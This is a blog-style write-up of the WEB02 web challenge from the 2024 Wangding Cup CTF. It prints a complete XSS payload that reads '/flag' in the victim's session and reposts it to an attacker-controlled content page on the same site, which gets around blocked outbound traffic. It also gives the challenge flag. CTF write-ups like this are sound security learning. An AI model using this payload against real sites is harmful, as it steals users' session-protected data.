首页 > 其他分享 >2024网鼎杯

2024网鼎杯

时间:2024-11-01 20:59:08浏览次数:1  
标签:content ok 2024 getElementById innerText Error 网鼎杯 response

赛题名称:WEB02

解题步骤(WriteUp)
第一步:登录

随便输入就能登陆

第二步:测试

登陆后简单试探发现可以xss

但是测试发现不能出网

我们没发把想要的内容弹到我们的服务器上

第三步:改变思路编写脚本

但是我们可以利用boss将想要的内容提交到我们所设置的模块里

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Content Display</title>
</head>
<body>
    <div id="flag-content">Loading...</div>
    <div id="response"></div> <!-- 添加一个用于显示POST响应的div -->

    <script>
        fetch('/flag')
            .then(response => {
                if (!response.ok) {
                    throw new Error('Network response was not ok');
                }
                return response.text(); // 获取响应文本
            })
            .then(data => {
                document.getElementById('flag-content').innerText = data;
                return fetch('/content/917420be0d2e454937b1001cfad79b29', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded'
                    },
                    body: new URLSearchParams({ content: data })
                });
            })
            .then(response => {
                if (!response.ok) {
                    throw new Error('Network response was not ok for POST');
                }
                return response.text();
            })
            .then(postResponse => {
                document.getElementById('response').innerText = postResponse;
                console.log('POST response:', postResponse);
            })
            .catch(error => {
                console.error('Error:', error);
                document.getElementById('flag-content').innerText = 'Error loading content';
                document.getElementById('response').innerText = 'Error sending request.';
            });
    </script>
</body>
</html>

拷打ai就可以帮我们跑出脚本

第四步:发包

但是要注意要在bp里发包提交

再点击提交
之后出来刷新页面即可

wdflag{4y57t70tswbtzk0n67kqnbhc3vtkzvac}

标签:content,ok,2024,getElementById,innerText,Error,网鼎杯,response
From: https://www.cnblogs.com/dghh/p/18514058

相关文章

  • 2024CSP-S邮寄
    前言去年被沉重打击到了,不过从此以后心态就好很多了,不会因为什么考试动不动就崩溃了。考前一直在认真复习,也停了课,甚至差点错过运动会。从国庆开始听了几天课,消化课件,然后考试。考试的稳定性不高,有时脑子清醒就能比较清楚自己应该做什么,如何分配时间以及写下对拍;但有时睡了觉起......
  • ARCore与Unity集成开发教程_2024-07-25_21-26-46.Tex
    ARCore与Unity集成开发教程ARCore简介ARCore功能概述ARCore是Google开发的增强现实(AR)平台,旨在为移动设备提供高精度的AR体验。它通过以下核心功能实现这一点:运动追踪:ARCore能够感知设备的移动,并在虚拟和现实世界之间保持稳定的定位,即使在设备移动时也能保持虚拟对象......
  • ARCore与UnrealEngine集成开发教程_2024-07-25_21-40-34.Tex
    ARCore与UnrealEngine集成开发教程ARCore简介ARCore功能概述ARCore是Google开发的增强现实(AR)平台,旨在为移动设备提供高精度的AR体验。它通过以下核心功能实现这一点:运动追踪:ARCore能够追踪设备的运动,即使在没有GPS信号的室内环境中,也能提供稳定的AR体验。它使用设备......
  • ARKit:ARKit场景构建与物体添加_2024-07-25_16-48-31.Tex
    ARKit:ARKit场景构建与物体添加ARKit基础介绍ARKit框架概述ARKit是苹果公司为iOS设备提供的增强现实开发框架,它允许开发者在iOS应用中创建沉浸式的AR体验。ARKit通过设备的摄像头、传感器和处理器,能够实时地检测和跟踪真实世界中的平面、光照、运动和环境特征,从而在这些平......
  • 2024御网杯web
    Webinput_data就是一个简单是svn泄露直接在pristine/57/中即可找到Admin通过爆错和提示可以确定是Thymeleaf模板注入命令执行参考资料:https://zhuanlan.zhihu.com/p/248416919https://xz.aliyun.com/t/9826?u_atoken=b9d5b4c8f462ecf95b3441b560c7c2f1&u_asig=0a47......
  • 2024-11-1
    mysql--DDL语句数值类型字符串类型时间类型添加表中字段修改表中数据类型,字段名跟字段类型删除字段修改表名删除表......
  • OIFC未来共同体20241023noip模拟二
    T1考虑从后往前去做,随机化字母权值,考虑两个字符,一个设为正的权值,一个设为负的权值,两两就可以抵消,若有一个后缀权值等于另一个后缀权值且长度为偶数,就肯定有一个回文串,若有一个后缀权值等于另一个后缀权值加减一个字母的权值且长度为奇数,就也肯定有一个回文串,存下来,离散化即可。#......
  • CSP-S2024赛后总结
    $\color{#f39c11}A.决斗$赛时:题目要求游戏结束后剩余怪兽尽可能少,所以我们要将每个怪兽的价值充分发挥。很容易想到一种贪心:用第二小的数先打第一小的,再用第三小的打第二小,……以此类推。这样就能保证能被打掉的都消灭了。双指针维护即可。最后把每一种怪兽剩余的数量......
  • OIFC未来共同体20241021noip模拟一
    T1建边,发现要找偶环,但两个奇环也可以拼在一起,于是按照上面的思路模拟即可。但是挂了一个点,不知道为啥。#include<iostream>#include<vector>#include<cstring>usingnamespacestd;inlineintread(){registerintx=0,f=1;registercharc=getchar();while(c<......
  • 第三届SXZOI [SXZOI 2024]
    第三届SXZOI比赛说明比赛共六题。延续了定期举办SXZOI的传统。希望未来的选手也能将这个传统延续下去。或许某一天,SXZOI会落幕;亦或者某一天,SXZOI将不再会只是一个校内的小比赛,将会是有大量校外选手参加的知名赛事。来源:唐龙家长群出题组难度:都是简单题!SXZOI未来的发......